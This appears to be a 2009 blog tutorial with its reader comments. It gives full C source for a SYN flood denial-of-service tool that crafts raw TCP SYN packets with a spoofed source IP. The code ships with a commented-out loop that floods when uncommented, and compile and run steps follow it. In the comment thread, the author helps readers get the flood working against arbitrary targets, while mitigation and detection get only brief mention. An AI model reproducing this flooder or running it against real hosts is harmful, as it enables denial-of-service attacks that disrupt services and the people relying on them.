3
2009
SYN Flood DOS Attack with C Source Code (Linux)
An article by Binary Tides
TCP/IP 3-way handshake is done to establish a connection between a client and a server. The process is :
1. Client –SYN Packet–> Server
2. Server –SYN/ACK Packet –> Client
3. Client –ACK Packet –> Server
The above 3 steps are followed to establish a connection between source and destination.
SYN Flood DOS attacks involves sending too many SYN packets (with a bad or random source ip) to the destination server. These SYN requests get queued up on the server’s buffer and use up the resources and memory of the server. This can lead to a crash or hang of the server machine.
After sending the SYN packet it is a half-open connection and it takes up resources on the server machine. So if an attacker sends syn packets faster than memory is being freed up on the server then it would be an overflow situation.Since the server’s resources are used the response to legitimate users is slowed down resulting in Denial of Service.
Most webservers now a days use firewalls which can handle such syn flood attacks and moreover even web servers are now more immune.
For more information on TCP Syn DOS attack read up rfc 4987 , titled “TCP SYN Flooding Attacks and Common Mitigations”
over here
Below is an example code in c :
Code
/*
Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<string.h> //memset
#include<sys/socket.h>
#include<stdlib.h> //for exit(0);
#include<errno.h> //For errno - the error number
#include<netinet/tcp.h> //Provides declarations for tcp header
#include<netinet/ip.h> //Provides declarations for ip header
struct pseudo_header //needed for checksum calculation
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
};
unsigned short csum(unsigned short *ptr,int nbytes) {
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}
int main (void)
{
//Create a raw socket
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
//Datagram to represent the packet
char datagram[4096] , source_ip[32];
//IP header
struct iphdr *iph = (struct iphdr *) datagram;
//TCP header
struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
struct sockaddr_in sin;
struct pseudo_header psh;
strcpy(source_ip , "192.168.1.2");
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr ("1.2.3.4");
memset (datagram, 0, 4096); /* zero out the buffer */
//Fill in the IP Header
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
iph->id = htonl (54321); //Id of this packet
iph->frag_off = 0;
iph->ttl = 255;
iph->protocol = IPPROTO_TCP;
iph->check = 0; //Set to 0 before calculating checksum
iph->saddr = inet_addr ( source_ip ); //Spoof the source ip address
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
//TCP Header
tcph->source = htons (1234);
tcph->dest = htons (80);
tcph->seq = 0;
tcph->ack_seq = 0;
tcph->doff = 5; /* first and only tcp segment */
tcph->fin=0;
tcph->syn=1;
tcph->rst=0;
tcph->psh=0;
tcph->ack=0;
tcph->urg=0;
tcph->window = htons (5840); /* maximum allowed window size */
tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
should fill in the correct checksum during transmission */
tcph->urg_ptr = 0;
//Now the IP checksum
psh.source_address = inet_addr( source_ip );
psh.dest_address = sin.sin_addr.s_addr;
psh.placeholder = 0;
psh.protocol = IPPROTO_TCP;
psh.tcp_length = htons(20);
memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
//IP_HDRINCL to tell the kernel that headers are included in the packet
int one = 1;
const int *val = &one;
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
{
printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
exit(0);
}
//Uncommend the loop if you want to flood :)
//while (1)
//{
//Send the packet
if (sendto (s, /* our socket */
datagram, /* the buffer containing headers and data */
iph->tot_len, /* total length of our datagram */
0, /* routing flags, normally always 0 */
(struct sockaddr *) &sin, /* socket addr, just like in */
sizeof (sin)) < 0) /* a normal send() */
{
printf ("error\n");
}
//Data send successfully
else
{
printf ("Packet Send \n");
}
//}
return 0;
}
Compile and Run
On Ubuntu
$ gcc synflood.c $ sudo ./a.out Packet Send
Use wireshark to check the packets and replies from server.
The sendto function if put in a loop will start flooding the destination ip with syn packets.
Popularity: 53% [?]
Subscribe
Recent Posts
- Compile wxwebconnect on Ubuntu 11.04 64 bit
- Disqus Comments Importer Script in PHP
- Beginners’ guide to socket programming with winsock
- Handle multiple socket connections with fd_set and select on Linux
- Beginners guide to socket programming in C on Linux
- Gui whois client in python with wxpython
- Whois client code in C with Linux sockets
- str_replace for C
- Easy to use C/C++ IDE for Ubuntu Linux
- Get local ip in C on linux
Hi,
can u pls tell me how to execute syn flooding attack in ns2.. Thank you..
what is ns2 ?
NetWork Simulator.. for simulation of wired and wireless networks..
you have to check the documentation of the application/simulator you are using.
can i check incoming syn packets by netstat command?
You can get some limited information like lots of TCP connections in TIME_WAIT state, but it may not be very useful.
How can i detect syn flood attack on Windows7?
one simple way to detect is by using a sniffer like wireshark and check the incoming packets.
in a synflood situation there would be lots of syn packets coming in.
how to send syn packets from Ubuntu to windows7?
You can use the code given in the post on Ubuntu. It does not matter what OS is running on the target system.
Actually can i kno for wat the above code is used..is it used to generate a tcp syn attack or detect a syn attack
The above code can be used to generate tcp syn attack. Not detect them.
[...] don't you google for it? here is one of Google's [...]
The program is running successfully…..!but syn packets are not flooded…..i used the wireshark to capture the packets….the result is zero bytes from the destination host….
Is there any modification require….?
to synflood , you have to uncomment the while loop. that is line number 120 , 121 , 137
you should be able to see lots of syn packets in wireshark when you run the program with the while loop.
make sure that no firewall is blocking syn packets on your local system.
Hello Sir,
Thank you very much for your solutions. Program is working fine except the followning warning:
$ gcc SYNattack.c
SYNattack.c:21:1: warning: useless storage class specifier in empty declaration
And otherwise Everything is working fine in program and thanks a lot. But I am not able to verify in wireshark tool so please help me out to verify the attack in wireshark tool. And is it possible to make this program to work in windows system, in order to do that what all additional files we need to include in program please help me out.
Thanking you sir,
Regards,
Raj
The code has been fixed. there should be no compiler warnings now.
Wireshark should show the transmitted packet. If not verify your setup. Is wireshark picking up other network packets properly ?
Is there any firewall running on the system. firewalls might block such packets.
For windows the winpcap library can be used to send syn packets. Check this :
http://www.binarytides.com/blog/raw-sockets-packets-with-winpcap/
Hello Sir,
Actually I was runnig Wireshark in LAN set-up and so only!, I am not able to see the other systems ips and attack. And I am new to this project please help me out to set-up the network and the components required for this.
I will be thank full to you.
Regards,
Raj
scan your network for other live hosts. use nmap , angry ip scanner or a similar tool. other hosts will have an ip similar to yours within the same subnet(netmask).
Hello Sir,
The program is running good except the below warning:
$ gcc SYNattack.c
SYNattack.c:21:1: warning: useless storage class specifier in empty declaration
$ sudo ./a.out
………………….
And i used wireshark to analyze and it was showing the transfer of TCP [SYN] in it. But what i am confused is the destination address of ip suppose to be edited exactly in which place and also it obtains the result for any random address we type. How we must clarify ourselves that the ip address exist or not??. please help me out and also please give some data to understand the program well.
Thanks & Regards.
raj
the destination ip is stored in the sockaddr_in structure sin :
sin.sin_addr.s_addr = inet_addr (“1.2.3.4″);
The ip address is passed as a string to the function inet_addr
Hello Sir,
Thank you for your last solution and its working fine but in ubuntu after running command :
raj@home$ sudo ./a.out
it will stop like this way:
.raj@home$
and i am using wireshark to chek but i am not able to find anything exactly so. how do i verify that. And
how to deal with these warnings,
$ sudo gcc SYNattack.c
SYNattack.c:17:1: warning: useless storage class specifier in empty declaration
SYNattack.c: In function ‘main’:
SYNattack.c:59:2: warning: incompatible implicit declaration of built-in function ‘memset’
SYNattack.c:100:2: warning: incompatible implicit declaration of built-in function ‘memcpy’
Thank you for your help sir.
Regards,
Raj
I have updated the code. Now you should not get the memset and memcpy warnings.
sudo is not needed why compiling the code. Simply :
$ gcc SYNattack.c
use sudo when running the program :
$sudo ./a.out
The dot ‘.’ in the output indicates that the packet has been send. The code by default only sends out 1 packet and it might be difficult to detect in large traffic in wireshark. Use filter in wireshark or uncomment the while loop and the program will send multiple packets. Then it will be easier to detect the packets in wireshark
Hello Sir,
I run the program in ubuntu but its giving some warnings and after that i tried to execute “./a.out” but its showing this error, please help me out sir, i will be thankful to you.
raj@home:~$ ./a.out
Warning: Cannot set HDRINCL!
error
raj@home:~$
Regards,
Raj
you need to run the program with root privileges like this :
$ sudo ./a.out
Awsome, thanks bro….
lf moar source codes \o
we want VB.NET code not linux
Sir,
When i run the code I am getting this –> “Warning: Cannot set HDRINCL!n”…Dont understand why it returns -1 in the loop there…Could you please shed some light?
Regards
Did you run the code with root privileges ?
Complementing my last e-mail…
Compliation were generating warnings so I included:
#include // -> it seems it was necessary to use memset
…and also, I excluded the “typedef” command when defining the pseudo_header
This eliminates the warnings but the result is still the same.
regards
Folks, I tried it and it looks it’s working, but, too slow.
Although the terminal shows a thousand dots per second, wireshark takes 5 secs to show each group of 3 SYN packets sent.
Any advice?
regards
Hey guys,can anyone please explain what does the following line:
struct iphdr *iph = (struct iphdr *) datagram;
Thank you very much.
I have tested the code already.
It’s very cool!
Thx man! :)
AZIDBLAZER – I’m not a programmer, but a wireless engineer and I’m looking for a way to perform a specific test on our WLAN equipment. I’m testing a firewall function and do not want to use the test we have typically used because it is not a “real-world” practical test IMO. I’d like to test SYN flood between two wifi clients with firewall function mitigating the attack.
Please email me if you wouldn’t mind helping me understand your script and getting it to function correctly. I have a linux test bed in my lab and will attempt on my own, but as I stated, I’m not a programmer so I don’t know how far i will get. Thank you.
The program runs but no packets are sent to the target. I use wireshark to monitor the LAN traffic. I can’t figure out what seems to be the problem.
make sure you are running the program with root privileges.
I keep getting error: stray ‘\240\’ and error: stray ’320′ during compilation
can anyone help me please?
check the line numbers where the error occurs and make sure that line has no special invisible characters.
Thanks a lot man! Really faster than any other solution that I found (since the others where made in perl/ruby/python, etc).
Dear AZIDBLAZER,
Thank you for your reply. Really appreciate it. Actually I need this program for simulate the DoS Attack in lab environment to proof and study the concept of three-way handshaking.
Best Regards.
Seriously Guys… If you dont know a programming language and are looking for a script to “PWN” your friends or anyone else this is not the palce to start. All you have to do is edit the while thats already in the code and uncomment it out. Im not going to tell you how because this is SIMPLE PROGRAMMING and i dont want another script kiddie out there.
Dear Sir,
I think I’m facing the same problem as previous comment posted.
I would appreciate if you help on the required modification.
Regards,
Moe
Did you run the program with root privileges and still wireshark did not detect any packet ?
Dear Sir,
I had compiled this program but it doesn’t works as to generate syn packet. Is is need modification on this source code ?
What does it means from this statement ?
The sendto function if put in a loop will start flooding the destination ip with syn packets.
Do I need to modify the code ? Please help me, I really need the code for generate syn packet for me to simulate dos attack.
Thank you
Make sure you run the program with root privileges.
Also check using wireshark if packets are being send or not.